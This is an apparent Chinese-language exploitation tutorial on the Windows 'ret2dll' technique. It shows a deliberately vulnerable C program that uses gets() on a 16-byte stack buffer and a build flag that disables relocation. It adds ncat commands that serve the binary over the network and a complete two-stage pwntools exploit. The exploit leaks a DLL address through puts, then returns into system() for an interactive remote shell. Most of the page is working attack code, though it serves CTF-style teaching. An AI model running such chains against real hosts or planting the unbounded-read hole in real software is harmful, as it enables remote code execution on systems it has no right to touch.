ret2dll利用¶
原理与 Linux 下的 ret2libc 类似，不过需要手动提取地址（目前 pwntools 不能提取 exe 文件中的地址）。源代码如下：
#include <stdio.h>
#include <ctype.h>
#define DEFAULT_LEN 16
/* Reads one line from stdin into a 16-byte stack buffer with gets(),
 * which imposes no length limit: input longer than DEFAULT_LEN-1 bytes
 * runs past buff into the rest of the stack frame, including the saved
 * return address that the payload further down overwrites. This is the
 * deliberate bug the page demonstrates; the bounded form would be
 * fgets(buff, sizeof buff, stdin). Declared int but never returns a
 * value, so the result is undefined (and unused by the caller). */
int val(){
char buff[DEFAULT_LEN] = {0};
gets(buff);
}
/* Prints "start", lets val() read one line, then prints "end".
 * The fflush() calls are what make the banners reach the peer promptly
 * when stdout is a socket/pipe rather than a terminal (as under the
 * ncat / win_server launchers below), where stdio is fully buffered;
 * the exploit waits for "start" before sending anything.
 * "end" is only reached if val() returned with an intact frame. */
int main(void)
{
puts("start");
fflush(stdout);
val();
fflush(stdout);
puts("end");
fflush(stdout);
}
# Build with debug info (-g). "-Wl,--disable-reloc" asks the PE linker to
# emit no base-relocation data, so the loader cannot rebase the image: it
# is mapped at its preferred image base (0x140000000, judging by the
# exploit's constants) on every run, which is what keeps the hard-coded
# 0x14000xxxx addresses below valid. Leaving relocations in (the default,
# which permits ASLR / dynamic base) is the build-side mitigation that
# would invalidate every fixed address in the script.
gcc "-Wl,--disable-reloc" -g -o ret2dll.exe ret2dll.c
搭建临时环境¶
使用 ncat：`ncat -l 8080 --keep-open --exec ".\ret2dll.exe"`
使用 win_server：`win_server ./ret2dll.exe 8080`
exp如下
# Two-stage ret2dll script for the ret2dll.exe built above.
# Stage 1 overflows val()'s buffer so that puts() is called on puts's own
# import slot, printing the runtime address of the C runtime DLL.
# Stage 2 rebases three recorded DLL addresses from that leak and returns
# into system() with a command string that lives in the same DLL.
# Every constant is specific to this one binary and one DLL build and
# was read out by hand (pwntools does not resolve them from the exe);
# image relocation/ASLR on the exe or a different DLL version invalidates
# all of them.
from pwn import *
context.log_level='debug'
context.arch='amd64'
p=remote("192.168.0.190",8080)  # replace with the Windows host's IP
main_addr=0x14000155B  # entered by hand: address of main() in the exe
ret_addr=0x1400015D7  # presumably a lone `ret` gadget used for stack alignment — verify in the disassembly
puts_plt=0x140002868  # presumably the import thunk that jumps to puts — verify
puts_got=0x14000829C  # presumably the import-table slot holding puts's runtime address ("got" name kept from the Linux analogue)
rdi_addr=0x140002447  # not used below
rcx_addr=0x140002750  # presumably `pop rcx; ret`: Windows x64 passes the first argument in rcx
#bp 0x140001554
payload = b'a' * (0x10 +8)  # 16-byte buffer plus 8 more bytes (presumably the saved frame pointer) up to the return address
payload += p64(rcx_addr)  # return into the gadget ...
payload += p64(puts_got)  # ... which pops this into rcx: puts's own import slot
payload += p64(puts_plt)  # puts(&puts) writes the leaked pointer to stdout
payload += p64(main_addr)  # then re-enter main() so a second line can be sent
p.recvuntil("start")  # wait for the banner; a str here relies on pwntools encoding it, b"start" is the unambiguous spelling
p.sendline(payload)
puts_leak=u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))  # the printed pointer is 6 significant bytes ending in 0x7f (user-space range); zero-pad to 8 for u64
print("leak addr:",hex(puts_leak))
puts_dll=0x11014E470  # puts as recorded from this DLL build
cmd_dll=0x0110179E48  # presumably a command string inside the same DLL — verify
sytem_dll=0x0110117E50  # system (the name is a typo for "system"; left as-is, it is only a local)
dll_base=puts_leak-puts_dll  # delta between runtime and recorded addresses; it only needs to be consistent across the three constants above, so they may be absolute addresses from one debugging session rather than true offsets
# dll_base=0x7ffe71e00000
print("base addr:",hex(dll_base))
cmd_addr = dll_base +cmd_dll
system_addr=dll_base+sytem_dll
print("start attck")
payload = b'a' * (0x10 + 8)  # same padding as stage 1
payload += p64(ret_addr)  # extra ret, presumably to realign the stack before the call
payload += p64(rcx_addr)
payload += p64(cmd_addr)  # rcx = command string
payload += p64(system_addr)  # system(cmd)
p.sendline(payload)
p.interactive()
效果如下